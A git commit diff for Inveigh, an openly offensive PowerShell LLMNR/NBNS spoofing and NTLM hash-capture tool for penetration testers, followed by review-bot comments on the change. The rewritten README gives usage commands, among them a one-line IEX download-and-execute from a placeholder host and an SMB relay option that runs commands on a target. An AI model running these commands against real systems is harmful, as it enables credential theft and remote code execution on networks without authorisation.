-rw-r--r-- | Inveigh.ps1 | bin | 173574 -> 94034 bytes
-rw-r--r-- | Invoke-Inveigh/Inveigh.psm1 | bin | 191774 -> 0 bytes
-rw-r--r-- | Invoke-Inveigh/README.md | 20
-rw-r--r-- | README.md | 53
-rw-r--r-- | TODO.md | 12
5 files changed, 45 insertions, 40 deletions
diff --git a/Inveigh.ps1 b/Inveigh.ps1 Binary files differindex 83deed0..2bab315 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 diff --git a/Invoke-Inveigh/Inveigh.psm1 b/Invoke-Inveigh/Inveigh.psm1 Binary files differdeleted file mode 100644 index 3671f47..0000000 --- a/Invoke-Inveigh/Inveigh.psm1 +++ /dev/null diff --git a/Invoke-Inveigh/README.md b/Invoke-Inveigh/README.md deleted file mode 100644 index 8fbce14..0000000 --- a/Invoke-Inveigh/README.md +++ /dev/null @@ -1,20 +0,0 @@ -# Inveigh.psm1 - -Module version of Inveigh. This has not been fully tested. - -# Usage: -Import-Module ./Inveigh.psm1 - -Execute Invoke-Inveigh with optional parameters - -Cmdlets: -Invoke-Inveigh - Start Inveigh with or without parameters. -Get-Inveigh - Display queued output. -Get-InveighLog - Display log entries. -Get-InveighNTLMv1 - Display captured NTLMv1 challenge/response hashes. -Get-InveighNTLMv2 - Display captured NTLMv2 challenge/response hashes. -Watch-Inveigh - Enable realtime console output. -Hide-Inveigh - Disable realtime console output. -Clear-Inveigh - Clear NTLMv1, NTLMv2, log, output, failed smbrelay, and spoof repeat suppression lists. -Stop-Inveigh - Stop Invoke-Inveigh. -Get-InveighHelp - List the cmdlets. 
@@ -1,8 +1,8 @@ # Inveigh -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. # Requirements -Tested minimums are PowerShell 2.0 and .NET 3.5. +Tested minimums are PowerShell 2.0 and .NET 3.5 # Notes 1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. 
@@ -17,19 +17,56 @@ Tested minimums are PowerShell 2.0 and .NET 3.5. 10. SMB relay support is experimental at this point, use caution if employing on a pen test. # Usage -Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy. +Obtain an elevated administrator or SYSTEM shell. + +Use a method to load the module: + +To import with Import-Method: +Import-Module ./Inveigh.ps1 + +To import with dot source method: +. ./Inveigh.ps1 + +To load into memory using Invoke-Expression: +IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") To execute with default settings: -Inveigh.ps1 +Invoke-Inveigh + +To load and execute with one line: +Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: -Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path' +Invoke-Inveigh -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' To execute with SMB relay enabled: -Inveigh.ps1 -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" +Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" + +Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters + +# Cmdlets +Invoke-Inveigh - Start Inveigh with or without parameters +Get-Inveigh - Get queued console output +Get-InveighLog - Get log entries +Get-InveighNTLM - Get all captured challenge/response hashes +Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes +Get-InveighNTLMv2 - Get captured NTLMv2 challenge/response hashes +Get-InveighStats - Get captured challenge/response counts +Get-InveighHelp - 
List the cmdlets +Watch-Inveigh - Enable real time console output +Hide-Inveigh - Disable real time console output +Clear-Inveigh - Clear capture, log, smbrelay, and spoof lists +Stop-Inveigh - Stop Inveigh # Screenshots - +Invoke-Inveigh execution with real time console and file output enabled + + +Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 + HTTP to SMB Relay - + + +Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive Powershell Session payloads + diff --git a/TODO.md b/TODO.md deleted file mode 100644 index 24d965b..0000000 --- a/TODO.md +++ /dev/null @@ -1,12 +0,0 @@ -## To Do -- [ ] Code cleanup! -- [x] Add NBNS spoofer -- [x] Add ability to capture NTLMv1 challenge/responses -- [ ] Add ability to capture LM challenge/responses -- [x] Add HTTP for challenge/response captures -- [x] Add HTTPS for challenge/response captures -- [x] Add Get-Help style comments -- [ ] Add SMB listener -- [ ] Add exfiltration method for captures -- [x] Add SMBRelay -- [ ] Add wpad.dat
\ No newline at end of file |
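Review bot: Inveigh.ps1 shows up only as "Binary files differ" (173574 -> 94034 bytes), so the script change that carries the renamed entry point and new cmdlets cannot be reviewed line by line from this commit. If the file is stored in an encoding git treats as binary, re-saving it as UTF-8 or giving it a text diff setting in .gitattributes would make later changes to it readable in review.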
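Review bot: Deleting Invoke-Inveigh/Inveigh.psm1 and Invoke-Inveigh/README.md removes the documented "Import-Module ./Inveigh.psm1" path, and the top-level README never says the module was replaced by importing Inveigh.ps1. The deleted README also carried the caveat "This has not been fully tested", and the new text does not say whether that still applies to the cmdlets now listed; a short migration line in README.md would cover both.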
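Review bot: In the Requirements line of the first README.md hunk (@@ -1,8 +1,8 @@), the only change is the dropped trailing period after ".NET 3.5", which looks accidental and should be restored. In the intro sentence of the same hunk, "post exploitation" reads better hyphenated as "post-exploitation".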
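Review bot: In the Usage section of the second README.md hunk (@@ -17,19 +17,56 @@), "To import with Import-Method:" names a cmdlet that does not match the command under it, which is Import-Module; fix the label. The feature example drops -ForceWPADAuth and replaces -Output 0,1,2 with -ConsoleOutput and -FileOutput without saying whether the old parameters were removed or renamed, so existing command lines may break silently; add a line on that. The Invoke-Expression example fetches the script over plain http:// into an elevated shell with nothing checking what is executed, which deserves a caveat or an https URL, and the screenshot caption "NTLM2" should read "NTLMv2".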
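Review bot: TODO.md is deleted with five items still unchecked (code cleanup, LM challenge/response capture, SMB listener, exfiltration method for captures, wpad.dat), and nothing in this commit records where they are tracked now. Either keep the file or move the open items into README.md or the issue tracker so they are not lost.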